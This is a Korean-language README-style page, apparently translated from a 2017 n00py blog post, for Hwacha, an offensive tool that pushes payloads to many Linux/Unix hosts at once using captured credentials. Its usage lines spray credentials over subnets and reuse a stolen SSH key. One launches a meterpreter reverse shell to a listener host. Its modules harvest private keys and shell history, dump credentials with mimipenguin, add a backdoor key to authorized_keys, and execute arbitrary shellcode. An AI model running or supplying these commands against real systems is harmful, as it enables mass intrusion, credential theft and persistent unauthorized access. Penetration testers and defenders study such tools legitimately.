
페이로드를 *Nix 시스템에 대량으로 배포합니다

https://www.n00py.io/2017/12/raining-shells-on-linux-environments-with-hwacha/
Hwacha는 *Nix 기반 시스템에서 페이로드를 빠르게 실행하기 위한 도구입니다. 자격 증명을 획득한 전체 서브넷의 시스템에서 아티팩트를 쉽게 수집하거나 셸코드를 실행할 수 있습니다.
$python hwacha.py
&&&& && && &&
&&&&&&&&&&&& && && && Created by Esteban Rodriguez /~~\_
&&&&&& && &&&&&&&&&& && Web: https://www.n00py.io /| '` *\
&& && &&&&& && &&&&& Twitter: @n00py1 \| ___/
&& && &&&&& && && &&&&& _ _ _
&& && && && && && | | | | | |
&&&&&& && &&& &&& && | |_| |__ ____ _ ___| |__ __ _
&& && && && && | _ |\ \ /\ / / _` |/ __| '_ \ / _` |
&&&&&&&&&&&&&&& && | | | | \ V V / (_| | (__| | | | (_| |
&& && \_| |_/ \_/\_/ \__,_|\___|_| |_|\__,_|
명령 실행: -x [COMMAND]
모듈 실행: -m [MODULE]
모듈 옵션 지정: -o [ARG=ARG ARG=ARG]
사용 가능한 모든 모듈 보기: -L
사용 예:
python hwacha.py -t 192.168.1.1/24 -u admin -p password
python hwacha.py -t 192.168.1.100-200 -u admin -p password -m keys
python hwacha.py -t 192.168.1.100-200 -u admin -i loot/keys/192.168.1.101/id_rsa -x id
python hwacha.py -t 192.168.1.123 -u admin -p password -m meterpreter -o "LPORT=4444 LHOST=192.168.1.150 TYPE=64"
사용 가능한 모듈:
[*] meterpreter 대상에 meterpreter 에이전트를 실행하는 데 사용합니다.
필수 인자: LHOST , LPORT
선택 인자: TYPE {python, php, 32, 64, osx}
[*] mimipenguin 대상에서 mimipenguin을 실행하여 자격 증명을 복구하는 데 사용합니다. (루트 권한 필요)
선택 인자: LISTEN
[*] keys 대상에서 SSH 개인 키를 수집하는 데 사용합니다.
[*] history 대상에서 셸 히스토리 파일을 수집하는 데 사용합니다.
[*] privs 대상에서 sudo 권한을 열거하는 데 사용합니다.
[*] backdoor RSA 키 쌍을 생성하고 공개 키를 대상의 authorized_keys 파일에 추가합니다.
[*] web_delivery 대상에서 Python 스크립트를 실행하는 데 사용합니다.
필수 인자: PATH
선택 인자: LISTEN
[*] custom_bin 대상에서 사용자 정의 바이너리를 실행하는 데 사용합니다.
필수 인자: PATH
[*] sudo_exec 대상에서 사용자 정의 바이너리(sudo 사용)를 실행하는 데 사용합니다.
필수 인자: PATH
[*] shellcode 대상에서 사용자 정의 셸코드를 실행하는 데 사용합니다.
필수 인자: PATH
paramiko 필요:
pip install paramiko